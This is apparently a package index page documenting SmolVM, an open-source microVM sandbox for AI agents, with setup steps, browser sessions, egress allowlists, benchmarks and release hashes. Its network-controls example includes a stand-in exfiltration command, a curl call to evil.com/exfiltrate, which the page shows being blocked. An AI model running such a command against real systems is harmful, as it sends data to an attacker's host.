Secure runtime for AI agents, and tools -- free and open-source from Celesto AI 🧡
Project description
SmolVM
Secure, isolated computers that AI agents can use to browse, run code, and get real work done.
Quick start • Examples • Features • Performance • Docs • Community Slack
SmolVM gives AI agents their own disposable computer. Each sandbox is a lightweight virtual machine that boots in seconds, runs any code or command you throw at it, and disappears when you're done — nothing touches your host.
Features
- Sub-second boot — VMs ready in ~500 ms.
- Hardware isolation — Stronger security than containers.
- Network controls — Domain allowlists for egress filtering.
- Browser sessions — Full browser agents can see and control.
- Snapshots — Save and restore VM state instantly.
- OpenClaw — GUI Linux apps inside a sandbox.
Use cases
- Run untrusted code safely. Execute AI-generated code in an isolated sandbox instead of on your machine.
- Give agents a browser. Spin up a full browser session that agents can see and control in real time.
- Keep state across turns. Reuse the same sandbox throughout a multi-step workflow.
Quickstart
- Install the package.
pip install smolvm
- Run the one-time setup for your machine.
smolvm setup
Linux may prompt for sudo during setup so it can install host dependencies and configure runtime permissions.
- Check that the runtime is ready.
smolvm doctor
Start a sandbox in Python
from smolvm import SmolVM
with SmolVM() as vm:
result = vm.run("echo 'Hello from the sandbox!'")
print(result.stdout.strip())
The with block creates a sandbox, runs your command inside it, and tears the sandbox down automatically when the block exits.
Start a sandbox from the CLI
Create a sandbox, check that it's running, then stop it:
smolvm create --name my-sandbox
# my-sandbox running 172.16.0.2
smolvm list
# NAME STATUS IP
# my-sandbox running 172.16.0.2
smolvm stop my-sandbox
Open a shell inside a running sandbox:
smolvm ssh my-sandbox
Browser sessions
SmolVM can also start a full browser inside a sandbox. This is useful when agents need to navigate websites, fill out forms, or take screenshots.
Start a browser session with a live view you can watch in your own browser:
smolvm browser start --live
# Session: sess_a1b2c3
# Live view: http://localhost:6080
Open the URL to watch the browser in real time. When you're done, list and stop sessions:
smolvm browser list
smolvm browser stop sess_a1b2c3
See examples/browser_session.py for the Python equivalent.
Network controls
By default, sandboxes have full internet access. You can restrict which domains a sandbox can reach by passing internet_settings:
from smolvm import SmolVM
vm = SmolVM(internet_settings={
"allowed_domains": ["https://api.openai.com"],
})
vm.run("curl https://api.openai.com/v1/models") # allowed
vm.run("curl https://evil.com/exfiltrate") # blocked
See docs/concepts/network-egress-controls.md for how it works under the hood.
Examples
Getting started
| What you'll learn | Example |
|---|---|
| Run code in a sandbox | quickstart_sandbox.py |
| Start a browser session | browser_session.py |
| Pass environment variables into a sandbox | env_injection.py |
Agent framework integrations
These examples show how to wrap SmolVM as a tool for popular agent frameworks, so an AI model can run shell commands or drive a browser through your sandbox.
| Framework | Example |
|---|---|
| OpenAI Agents | openai_agents_tool.py |
| LangChain | langchain_tool.py |
| PydanticAI — shell tool | pydanticai_tool.py |
| PydanticAI — reusable sandbox across turns | pydanticai_reusable_tool.py |
| PydanticAI — browser automation | pydanticai_agent_browser.py |
| Computer use (click and type) | computer_use_browser.py |
Advanced
| What it does | Example |
|---|---|
| Install and run OpenClaw inside a Debian sandbox with a 4 GB root filesystem | openclaw.py |
Each script shows its own pip install ... line when it needs extra packages.
Security
SmolVM automatically trusts new sandboxes on first connection to keep setup simple. This is safe for local development, but you should not expose sandbox network ports publicly without extra controls. See SECURITY.md for the full policy and scope.
Performance
Median lifecycle timings on a standard Linux host:
| Phase | Time |
|---|---|
| Create + Start | ~572 ms |
| Ready to accept commands | ~2.1 s |
| Command execution | ~43 ms |
| Stop + Delete | ~751 ms |
| Full lifecycle (boot, run, teardown) | ~3.5 s |
Run the benchmark yourself:
python3 scripts/benchmarks/bench_subprocess.py --vms 10 -v
Measured on AMD Ryzen 7 7800X3D (8C/16T), Ubuntu Linux. SmolVM uses Firecracker, a lightweight virtual machine manager built for running thousands of secure, fast micro-VMs.
Contributing
See CONTRIBUTING.md to get started.
License
Apache 2.0 — see LICENSE for details.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file smolvm-0.0.8.dev0.tar.gz.
File metadata
- Download URL: smolvm-0.0.8.dev0.tar.gz
- Upload date:
- Size: 253.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
261a98528af7486f3d693f617ae6a8250a83ccf9baf2e421b633ec0398229587
|
|
| MD5 |
e2060b08a0aee1a80b859fc4e62af9a3
|
|
| BLAKE2b-256 |
bdd5c718a08de6dc5f7651d1792df68010db027d36a57c919ce7049c3b43dc3b
|
Provenance
The following attestation bundles were made for smolvm-0.0.8.dev0.tar.gz:
Publisher:
publish.yml on CelestoAI/SmolVM
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
smolvm-0.0.8.dev0.tar.gz -
Subject digest:
261a98528af7486f3d693f617ae6a8250a83ccf9baf2e421b633ec0398229587 - Sigstore transparency entry: 1253975931
- Sigstore integration time:
-
Permalink:
CelestoAI/SmolVM@927c9ed32db79eb591009aef7dc07917e95575a4 -
Branch / Tag:
refs/tags/v0.0.8.dev0 - Owner: https://github.com/CelestoAI
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@927c9ed32db79eb591009aef7dc07917e95575a4 -
Trigger Event:
push
-
Statement type:
File details
Details for the file smolvm-0.0.8.dev0-py3-none-any.whl.
File metadata
- Download URL: smolvm-0.0.8.dev0-py3-none-any.whl
- Upload date:
- Size: 180.6 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
48ee34ded8ac01b2c560044433a37041bbdeec3c0802df5f264183beb1531eb5
|
|
| MD5 |
256cfb62b1acc99a82de1882b94ca349
|
|
| BLAKE2b-256 |
96093b9fc43734183634a158e7fa52f37bc9fa70e512b521933edbb59919ca71
|
Provenance
The following attestation bundles were made for smolvm-0.0.8.dev0-py3-none-any.whl:
Publisher:
publish.yml on CelestoAI/SmolVM
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
smolvm-0.0.8.dev0-py3-none-any.whl -
Subject digest:
48ee34ded8ac01b2c560044433a37041bbdeec3c0802df5f264183beb1531eb5 - Sigstore transparency entry: 1253975984
- Sigstore integration time:
-
Permalink:
CelestoAI/SmolVM@927c9ed32db79eb591009aef7dc07917e95575a4 -
Branch / Tag:
refs/tags/v0.0.8.dev0 - Owner: https://github.com/CelestoAI
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@927c9ed32db79eb591009aef7dc07917e95575a4 -
Trigger Event:
push
-
Statement type:
